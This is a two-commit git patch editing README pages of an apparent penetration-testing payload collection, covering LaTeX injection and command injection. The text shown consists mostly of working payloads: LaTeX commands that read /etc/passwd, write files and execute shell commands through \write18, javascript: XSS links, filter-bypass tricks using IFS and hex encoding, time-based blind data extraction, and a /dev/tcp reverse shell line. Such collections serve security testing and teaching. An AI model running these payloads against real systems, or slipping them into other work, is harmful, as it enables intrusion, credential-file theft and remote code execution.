From 1865b8a85bb7d8b945d7dc3e23af5990260628f2 Mon Sep 17 00:00:00 2001
From: Podalirius <79218792+p0dalirius@users.noreply.github.com>
Date: Wed, 29 Sep 2021 07:28:11 +0200
Subject: [PATCH 1/2] Update README.md

---
 LaTeX Injection/README.md | 43 +++++++++++++++++++++++----------------
 1 file changed, 25 insertions(+), 18 deletions(-)

diff --git a/LaTeX Injection/README.md b/LaTeX Injection/README.md
index 5cce2b7..6c9d9cb 100644
--- a/LaTeX Injection/README.md	
+++ b/LaTeX Injection/README.md	
@@ -2,14 +2,16 @@
 
 ## Read file
 
-```bash
+Read file and interpret the LaTeX code in it:
+
+```tex
 \input{/etc/passwd}
-\include{password} # load .tex file
+\include{somefile} # load .tex file (somefile.tex)
 ```
 
-Read single lined file
+Read single lined file:
 
-```bash
+```tex
 \newread\file
 \openin\file=/etc/issue
 \read\file to\line
@@ -17,9 +19,9 @@ Read single lined file
 \closein\file
 ```
 
-Read multiple lined file
+Read multiple lined file:
 
-```bash
+```tex
 \newread\file
 \openin\file=/etc/passwd
 \loop\unless\ifeof\file
@@ -29,47 +31,52 @@ Read multiple lined file
 \closein\file
 ```
 
-Read text file, keep the formatting
+Read text file, **without** interpreting the content, it will only paste raw file content:
 
-```bash
+```tex
 \usepackage{verbatim}
 \verbatiminput{/etc/passwd}
 ```
 
 ## Write file
 
-```bash
+Write single lined file:
+
+```tex
 \newwrite\outfile
 \openout\outfile=cmd.tex
 \write\outfile{Hello-world}
+\write\outfile{Line 2}
+\write\outfile{I like trains}
 \closeout\outfile
 ```
 
 ## Command execution
 
-The input of the command will be redirected to stdin, use a temp file to get it.
+The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
 
-```bash
-\immediate\write18{env > output}
+```tex
+\immediate\write18{id > output}
 \input{output}
 ```
 
-If you get any LaTex error, consider using base64 to get the result without bad characters
+If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):
 
-```bash
+```tex
 \immediate\write18{env | base64 > test.tex}
 \input{text.tex}
 ```
 
-```bash
-\input|ls|base4
+```tex
+\input|ls|base64
 \input{|"/bin/hostname"}
 ```
 
 ## Cross Site Scripting
 
 From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) 
-```bash
+
+```tex
 \url{javascript:alert(1)}
 \href{javascript:alert(1)}{placeholder}
 ```
@@ -80,4 +87,4 @@ Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{
 
 * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
 * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
-* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
\ No newline at end of file
+* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)

From 173e34ede01bea806ee330529e6abf5b270e4f3b Mon Sep 17 00:00:00 2001
From: Podalirius <79218792+p0dalirius@users.noreply.github.com>
Date: Wed, 29 Sep 2021 07:39:07 +0200
Subject: [PATCH 2/2] Fixed arrow characters in shell prompts for clarity

Fixed arrow characters in shell prompts for clarity
---
 Command Injection/README.md | 40 ++++++++++++++++++-------------------
 1 file changed, 20 insertions(+), 20 deletions(-)

diff --git a/Command Injection/README.md b/Command Injection/README.md
index c309ec1..a4e0d0b 100644
--- a/Command Injection/README.md	
+++ b/Command Injection/README.md	
@@ -71,23 +71,23 @@ Works on Linux only.
 swissky@crashlab:~/Www$ cat</etc/passwd
 root:x:0:0:root:/root:/bin/bash
 
-swissky@crashlab▸ ~ ▸ $ {cat,/etc/passwd}
+swissky@crashlab:~$ {cat,/etc/passwd}
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 
-swissky@crashlab▸ ~ ▸ $ cat$IFS/etc/passwd
+swissky@crashlab:~$ cat$IFS/etc/passwd
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 
-swissky@crashlab▸ ~ ▸ $ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
+swissky@crashlab:~$ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
 RCE
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 
-swissky@crashlab▸ ~ ▸ $ X=$'uname\x20-a'&&$X
+swissky@crashlab:~$ X=$'uname\x20-a'&&$X
 Linux crashlab 4.4.X-XX-generic #72-Ubuntu
 
-swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
+swissky@crashlab:~$ sh</dev/tcp/127.0.0.1/4242
 ```
 
 Commands execution without spaces, $ or { } - Linux (Bash only)
@@ -114,28 +114,28 @@ something%0Acat%20/etc/passwd
 Linux
 
 ```powershell
-swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
+swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
 /etc/passwd
 
-swissky@crashlab▸ ~ ▸ $ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
+swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
 root:x:0:0:root:/root:/bin/bash
 
-swissky@crashlab▸ ~ ▸ $ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
+swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
 root:x:0:0:root:/root:/bin/bash
 
-swissky@crashlab▸ ~ ▸ $ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
+swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
 root:x:0:0:root:/root:/bin/bash
 
-swissky@crashlab▸ ~ ▸ $ xxd -r -p <<< 2f6574632f706173737764
+swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
 /etc/passwd
 
-swissky@crashlab▸ ~ ▸ $ cat `xxd -r -p <<< 2f6574632f706173737764`
+swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
 root:x:0:0:root:/root:/bin/bash
 
-swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764)
+swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
 /etc/passwd
 
-swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
+swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
 root:x:0:0:root:/root:/bin/bash
 ```
 
@@ -144,19 +144,19 @@ root:x:0:0:root:/root:/bin/bash
 Commands execution without backslash and slash - linux bash
 
 ```powershell
-swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1}
+swissky@crashlab:~$ echo ${HOME:0:1}
 /
 
-swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd
+swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
 root:x:0:0:root:/root:/bin/bash
 
-swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1'
+swissky@crashlab:~$ echo . | tr '!-0' '"-1'
 /
 
-swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< .
+swissky@crashlab:~$ tr '!-0' '"-1' <<< .
 /
 
-swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
+swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
 root:x:0:0:root:/root:/bin/bash
 ```
 
@@ -221,12 +221,12 @@ g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
 Extracting data : char by char
 
 ```powershell
-swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
+swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
 real    0m5.007s
 user    0m0.000s
 sys 0m0.000s
 
-swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
+swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
 real    0m0.002s
 user    0m0.000s
 sys 0m0.000s